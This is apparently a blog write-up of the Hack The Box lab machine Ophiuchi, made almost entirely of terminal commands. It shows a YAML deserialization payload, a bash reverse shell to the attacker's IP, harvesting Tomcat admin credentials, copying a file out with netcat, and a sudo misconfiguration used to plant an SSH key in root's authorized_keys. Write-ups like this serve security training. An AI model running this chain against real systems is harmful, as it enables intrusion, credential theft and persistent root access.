Hack_The_Box_Writeups

Hack The Box – Ophiuchi

saksham dixit

http://10.10.10.227:8080/

β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads]

└─# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts

β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads]

└─# git clone https://github.com/artsploit/yaml-payload

β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads/yaml-payload]

└─# cat rev.sh          

#!/bin/sh

bash -i >& /dev/tcp/10.10.14.16/8888 0>&1

β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads/yaml-payload/src]

└─# gedit artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# javac src/artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# jar -cvf yaml-payload.jar -C src/ .

Now we go to browser

tomcat@ophiuchi:/$ cd /opt

tomcat@ophiuchi:/opt$ ls –lrt

tomcat@ophiuchi:/opt$ cd tomcat

tomcat@ophiuchi:~$ ls –lrt

tomcat@ophiuchi:~$ cd conf

tomcat@ophiuchi:~/conf$ ls –lrt

tomcat@ophiuchi:~/conf$ cat tomcat-users.xml

So here

Username: admin

Password: whythereisalimit

root@osboxes:~/Downloads/yaml-payload# ssh admin@10.10.10.227

admin@ophiuchi:~$ sudo –l

admin@ophiuchi:~$ cat /opt/wasm-functions/index.go

admin@ophiuchi:~$ cd /tmp

admin@ophiuchi:/tmp$ mkdir work && cd work

admin@ophiuchi:/tmp/work$ cp /opt/wasm-functions/main.wasm ./

admin@ophiuchi:/tmp/work$ sudo /usr/bin/go run /opt/wasm-functions/index.go

root@osboxes:~/Downloads/yaml-payload# nc -lvnp 1234 > main.wasm

admin@ophiuchi:/tmp/work$ cat main.wasm | nc 10.10.14.16 1234

https://webassembly.github.io/wabt/demo/wasm2wat/index.html

https://webassembly.github.io/wabt/demo/wat2wasm/index.html

root@osboxes:~/Downloads# cp test.wasm main.wasm

root@osboxes:~/Downloads# scp main.wasm admin@ophiuchi.htb:/tmp/work

root@osboxes:~/Downloads# ssh-keygen

echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvqChvcSz6rYFdxAqmgvFzTF5f6XYM05Gg21FzfiuU7MyUNj4Ak2FyxbtKZv01YoD91EetadIbhc/6pRS7Bu37j8lxsV1NjdaKewvsw0JCHfzqqghdYeNC0zHLZBrlfdb6AGGUMgYc3zTK/7mSc2X5vwRtcIMKYgwBB7x5JWH/b2t0SbVSpQRzPYpE4RwA/coPsbzY1BIJjuLk/Pv39M04WiDbG3nKVMmP+RyozKPwzp2C2FMjBXCfj7lPe/0NHb2Qr1F5XCwHoEzAVE0uGXvjyLtyKMJlMbagJO63NG5WCFUonwfF7UpOeZR43VdxzG2lT4XfwxawOMMcJPJAoluF root@osboxes” > /root/.ssh/authorized_keys

admin@ophiuchi:/tmp/work$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

Hi, I’m saksham dixit

Related Posts

Hack The Box – Spectra

──(rootπŸ’€kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/...
saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *